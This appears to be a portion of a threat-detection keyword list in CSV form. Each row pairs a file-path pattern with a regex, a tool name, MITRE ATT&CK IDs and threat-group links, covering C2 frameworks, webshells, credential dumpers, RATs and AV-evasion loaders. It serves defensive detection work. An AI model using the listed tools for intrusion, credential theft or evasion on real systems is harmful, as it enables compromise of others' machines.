"*\C2ReverseProxy\*",".{0,1000}\\C2ReverseProxy\\.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","14442"
"*\C2ReverseServer*",".{0,1000}\\C2ReverseServer.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","14443"
"*\C2script\*.ashx*",".{0,1000}\\C2script\\.{0,1000}\.ashx.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","14444"
"*\C2script\*.jsp*",".{0,1000}\\C2script\\.{0,1000}\.jsp.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","14445"
"*\C2script\*.php*",".{0,1000}\\C2script\\.{0,1000}\.php.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","14446"
"*\C3WebController.dll*",".{0,1000}\\C3WebController\.dll.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","14449"
"*\c99_locus7s.php*",".{0,1000}\\c99_locus7s\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14450"
"*\c99_PSych0.php*",".{0,1000}\\c99_PSych0\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14451"
"*\c99_w4cking.php*",".{0,1000}\\c99_w4cking\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14452"
"*\c99madshell.php*",".{0,1000}\\c99madshell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14453"
"*\c99shell.php*",".{0,1000}\\c99shell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14454"
"*\CachedGPPPassword.cs*",".{0,1000}\\CachedGPPPassword\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","14455"
"*\cachedump.py*",".{0,1000}\\cachedump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","14456"
"*\cachedump.py*",".{0,1000}\\cachedump\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","14457"
"*\cAcTuS.readme.txt*",".{0,1000}\\cAcTuS\.readme\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14458"
"*\cAcTuS.readme_2.txt*",".{0,1000}\\cAcTuS\.readme_2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14459"
"*\cAcTuS.readme_3.txt*",".{0,1000}\\cAcTuS\.readme_3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14460"
"*\cAcTuS.readme_4.txt*",".{0,1000}\\cAcTuS\.readme_4\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14461"
"*\cAcTuS.readme_5.txt*",".{0,1000}\\cAcTuS\.readme_5\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14462"
"*\CaiDao-Webshell-Password-LandGrey.jsp*",".{0,1000}\\CaiDao\-Webshell\-Password\-LandGrey\.jsp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14463"
"*\CamHacker\*",".{0,1000}\\CamHacker\\.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","14464"
"*\canisrufus.py*",".{0,1000}\\canisrufus\.py.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","14465"
"*\capcom_sys_exec.x64.dll*",".{0,1000}\\capcom_sys_exec\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","14466"
"*\CAPS LOCK.exe*",".{0,1000}\\CAPS\sLOCK\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14467"
"*\capture_netntlmv2.py*",".{0,1000}\\capture_netntlmv2\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","14468"
"*\capture_netntlmv2.txt*",".{0,1000}\\capture_netntlmv2\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","14469"
"*\Catch me.exe*",".{0,1000}\\Catch\sme\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14470"
"*\catspin-main\*",".{0,1000}\\catspin\-main\\.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","14471"
"*\ccmpwn.py*",".{0,1000}\\ccmpwn\.py.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","14473"
"*\ccmpwn\*",".{0,1000}\\ccmpwn\\.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","14474"
"*\Certify.exe*",".{0,1000}\\Certify\.exe.{0,1000}","offensive_tool_keyword","Certify","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","14475"
"*\Certify.exe*",".{0,1000}\\Certify\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","14476"
"*\Certify.exe*",".{0,1000}\\Certify\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","14477"
"*\Certipy.exe*",".{0,1000}\\Certipy\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14478"
"*\certipy.pfx*",".{0,1000}\\certipy\.pfx.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145 - T1649","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","10","7","633","66","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z","14479"
"*\certipy64.exe*",".{0,1000}\\certipy64\.exe.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","14480"
"*\ChaiLdr.exe*",".{0,1000}\\ChaiLdr\.exe.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","14481"
"*\ChaiLdr-main*",".{0,1000}\\ChaiLdr\-main.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","14482"
"*\Chakra.dll*",".{0,1000}\\Chakra\.dll.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","14483"
"*\changepasswd.py*",".{0,1000}\\changepasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14484"
"*\ChannelLinter.exe*",".{0,1000}\\ChannelLinter\.exe.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","14485"
"*\ChannelLinter_d64.exe*",".{0,1000}\\ChannelLinter_d64\.exe.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","14486"
"*\chaos.exe*",".{0,1000}\\chaos\.exe.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","14487"
"*\CHAOS-5.0.1.zip*",".{0,1000}\\CHAOS\-5\.0\.1\.zip.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","14488"
"*\CHAOS-master.zip*",".{0,1000}\\CHAOS\-master\.zip.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","14489"
"*\charlotte.cpp*",".{0,1000}\\charlotte\.cpp.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","14490"
"*\charlotte.py*",".{0,1000}\\charlotte\.py.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","14491"
"*\Checkerv2.0.exe -outfile * -outformat *",".{0,1000}\\Checkerv2\.0\.exe\s\-outfile\s.{0,1000}\s\-outformat\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","14492"
"*\CheckPort.exe*",".{0,1000}\\CheckPort\.exe.{0,1000}","offensive_tool_keyword","CheckPort","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","CheckPort","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","14493"
"*\CheckPort.exe*",".{0,1000}\\CheckPort\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","CheckPort","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","14494"
"*\checkRoot.ps1*",".{0,1000}\\checkRoot\.ps1.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","14495"
"*\CheckSMBSigning.ps1*",".{0,1000}\\CheckSMBSigning\.ps1.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","0","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","14496"
"*\Check-VM.ps1*",".{0,1000}\\Check\-VM\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","14497"
"*\cheetah.py*",".{0,1000}\\cheetah\.py.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","14498"
"*\cheetah-master.zip*",".{0,1000}\\cheetah\-master\.zip.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","14499"
"*\chimera.py*",".{0,1000}\\chimera\.py.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","14500"
"*\Chimera-main\*",".{0,1000}\\Chimera\-main\\.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","14501"
"*\chisel.exe*",".{0,1000}\\chisel\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","14502"
"*\chisel.exe*",".{0,1000}\\chisel\.exe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","14503"
"*\chisel\client\*",".{0,1000}\\chisel\\client\\.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","14504"
"*\chisel\server\*",".{0,1000}\\chisel\\server\\.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","14505"
"*\chisel_x32*",".{0,1000}\\chisel_x32.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","14506"
